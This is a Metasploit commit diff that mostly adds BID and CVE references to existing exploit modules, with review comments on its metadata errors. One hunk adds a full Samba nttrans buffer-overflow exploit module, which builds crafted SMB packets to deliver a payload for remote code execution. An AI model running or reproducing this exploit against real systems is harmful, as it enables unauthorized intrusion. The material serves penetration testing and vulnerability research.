Reference updates

git-svn-id: file:///home/svn/framework3/trunk@4154 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-11-28 17:18:43 +00:00
parent 84f7a28fc7
commit 810f80612b
31 changed files with 196 additions and 0 deletions


@ -19,6 +19,7 @@ class Exploits::Irix::Lpd::TagPrinterExec < Msf::Exploit::Remote
'References' =>
[
['OSVDB', '8573'],
['CVE', '2001-0800'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
['MIL', '35'],
],


@ -20,6 +20,8 @@ class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
['BID', '15131'],
['CVE', '2005-3252'],
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>


@ -0,0 +1,145 @@
require 'msf/core'
module Msf
class Exploits::Multi::Samba::NTTrans_Overflow < Msf::Exploit::Remote
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba nttrans Overflow',
'Description' => %q{
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3425 $',
'References' =>
[
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets' =>
[
["Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
# 0x081fc968
pattern = Rex::Text.pattern_create(12000)
pattern[532, 4] = [0x81b847c].pack('V')
pattern[836, payload.encoded.length] = payload.encoded
# 0x081b8138
connect
smb_login
targ_address = 0xfffbb7d0
#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#
subcommand = 1
param = ''
body = ''
setup_count = 0
setup_data = ''
data = param + body
pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
#
# Send a NTTrans secondary request with the magic displacement
#
param = pattern
body = ''
data = param + body
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
handler
end
end
end
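Review bot: The new NTTrans_Overflow module lands with an empty `'Description' => %q{ }` and an empty `'References' => [ ]`, in a commit whose stated purpose is reference updates, so it is the one module here that nobody tracking exposure can map to an advisory or a fixed version. Add the advisory entries in the same form the other modules use, for example `[ 'CVE', '<CVE-ID>' ],`, and a description that names the affected Samba releases. The target's `'Rets' => [0x01020304, 0x41424344]` looks like placeholder data that `exploit` never reads, and both `ack` results are assigned but unused. Together these suggest unfinished work that would be easier to review in its own commit.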


@ -22,6 +22,8 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '10271'],
[ 'CVE', '2004-0430'],
[ 'OSVDB', '5762' ],
[ 'MIL', '2' ],
],


@ -19,6 +19,8 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '7294'],
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
[ 'MIL', '54'],


@ -21,6 +21,7 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '3517'],
[ 'OSVDB', '4503'],
[ 'CVE', '2001-0803'],
[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],


@ -22,6 +22,8 @@ class Exploits::Solaris::Samba::Trans2Open_Overflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '7294'],
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
[ 'MIL', '55'],


@ -22,6 +22,8 @@ class Exploits::Solaris::Sunrpc::SadmindExec < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
['BID', '8615'],
['CVE', '2003-0722'],
['OSVDB', '4585'],
['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
['MIL', '64']


@ -20,6 +20,7 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' => [
[ 'BID', '12622'],
[ 'OSVDB', '14047'],
[ 'CVE', '2005-0511'],
[ 'MIL', '81'],


@ -30,6 +30,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
'References' =>
[
[ 'OSVDB', '12418'],
[ 'BID', '11974'],
[ 'CVE', '2004-1172'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
[ 'MIL', '10'],


@ -22,6 +22,7 @@ class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Rem
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '14022'],
[ 'CVE', '2005-0773'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],


@ -21,6 +21,8 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '13102'],
[ 'CVE', '2005-1018'],
[ 'MIL', '16'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],


@ -29,6 +29,8 @@ class Exploits::Windows::Browser::AimGoaway < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', ' 10889'],
[ 'CVE', ' 2004-0636'],
[ 'OSVDB', '8398' ],
[ 'MIL', '3' ],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
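Review bot: The identifiers in `[ 'BID', ' 10889']` and `[ 'CVE', ' 2004-0636']` carry a leading space inside the string, so any lookup or link built from the value will not match the real id. They should read `[ 'BID', '10889'],` and `[ 'CVE', '2004-0636'],`. The same defect appears in the IIS_FP30REG_Chunked section as `[ 'CVE', ' 2003-0822']`. The rendered page lost the +/- markers, so it is inferred rather than certain that these are the lines this commit adds. The references array starts before and ends after the hunk.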


@ -33,6 +33,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
DWL-G132 driver (v1.21).
This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
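Review bot: The description text contains a typo, `fixed the flaw it the latest version`, which should read `fixed the flaw in the latest version`. This is the remediation statement an operator reads to learn which driver release (v1.21) carries the fix, so it is worth getting right. The page lost the +/- markers, so it is an inference that this sentence is among the lines the hunk adds. The description string begins and ends outside the hunk.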


@ -17,6 +17,8 @@ class Exploits::Windows::Ftp::Cesarftp_Mkd < Msf::Exploit::Remote
'Version' => '$Revision: 3583 $',
'References' =>
[
[ 'BID', '18586'],
[ 'CVE', '2006-2961'],
[ 'URL', 'http://secunia.com/advisories/20574/' ],
],
'Privileged' => true,


@ -21,6 +21,8 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '15457'],
[ 'CVE', '2005-3683'],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
],


@ -19,7 +19,9 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '13454'],
[ 'OSVDB', '16049'],
[ 'CVE', '2005-1415'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
[ 'MIL', '22'],
],


@ -18,6 +18,8 @@ class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '10078' ],
[ 'CVE', '1999-0256'],
[ 'OSVDB', '875' ],
[ 'MIL', '75' ],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],


@ -27,6 +27,8 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
'Version' => '$Revision: 3110 $',
'References' =>
[
[ 'BID', '5033' ],
[ 'CVE', '2002-0392' ],
[ 'OSVDB', '838'],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],
[ 'MIL', '4'],


@ -19,6 +19,8 @@ class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
'Version' => '$Revision: 3110 $',
'References' =>
[
[ 'BID', '8965'],
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
[ 'MIL', '24'],


@ -23,7 +23,9 @@ class Exploits::Windows::Iis::MS01_023_PRINTER < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '2674'],
[ 'OSVDB', '3323'],
[ 'CVE', '2001-0241'],
[ 'MSB', 'MS01-023'],
[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],
[ 'MIL', '27'],


@ -20,6 +20,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '7116'],
[ 'OSVDB', '4467'],
[ 'MSB', 'MS03-007'],
[ 'CVE', '2003-0109'],


@ -23,6 +23,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
[
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
[ 'CVE', '2004-1520'],
[ 'MIL', '33'],
],


@ -22,7 +22,9 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9007'],
[ 'OSVDB', '2952'],
[ 'CVE', ' 2003-0822'],
[ 'MSB', 'MS03-051'],
[ 'MIL', '29'],


@ -24,7 +24,9 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '8035'],
[ 'OSVDB', '4535'],
[ 'CVE', '2003-0349'],
[ 'MSB', 'MS03-022'],
[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
[ 'MIL', '30'],


@ -20,6 +20,8 @@ class Exploits::Windows::Ldap::IMAIL_LDAP_THC < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9682'],
[ 'CVE', '2004-0297'],
[ 'OSVDB', '3984'],
[ 'URL', 'http://secunia.com/advisories/10880/'],
[ 'MIL', '34'],


@ -23,6 +23,8 @@ class Exploits::Windows::Mssql::MS02_039_ResOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '5310'],
[ 'CVE', '2002-0649'],
[ 'OSVDB', '4578'],
[ 'MSB', 'MS02-039'],
[ 'MIL', '44'],


@ -22,6 +22,8 @@ class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '5411'],
[ 'CVE', '2002-1123'],
[ 'MSB', 'MS02-056'],
[ 'CVE', '2002-1123'],
[ 'MIL', '43'],
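Review bot: The reference list now names the same identifier twice: `[ 'CVE', '2002-1123']` appears both before and after the `MSB` entry. One of the two should be dropped so that tools which count or deduplicate references per module are not skewed. The hunk grows the list by two lines, so the first CVE line was presumably added without noticing the existing one, though the page does not mark which lines are new. The array closes outside the hunk.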


@ -36,6 +36,7 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9633'],
[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
[ 'MSB', 'MS04-007'],
[ 'CVE', '2003-0818'],


@ -22,6 +22,7 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '11372'],
[ 'OSVDB', '10689'],
[ 'CVE', '2004-0206'],
[ 'MSB', 'MS04-031'],
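Review bot: The bulletin id in the list, `[ 'MSB', 'MS04-031']`, disagrees with the class name `MS04_039_NETDDE` shown in the hunk header, so one of the two is wrong. A references pass is the natural place to reconcile them, because anyone matching modules to patch bulletins by name will otherwise look up the wrong advisory. If the reference is the correct one, as the NetDDE CVE entry beside it suggests, the class and file name should be corrected in a follow-up rename. The class definition itself lies outside the hunk.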


@ -19,6 +19,7 @@ class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote
'Version' => '$Revision: 3744 $',
'References' =>
[
[ 'BID', '17908'],
[ 'CVE', '2006-0027'],
[ 'MSB', 'MS06-019'],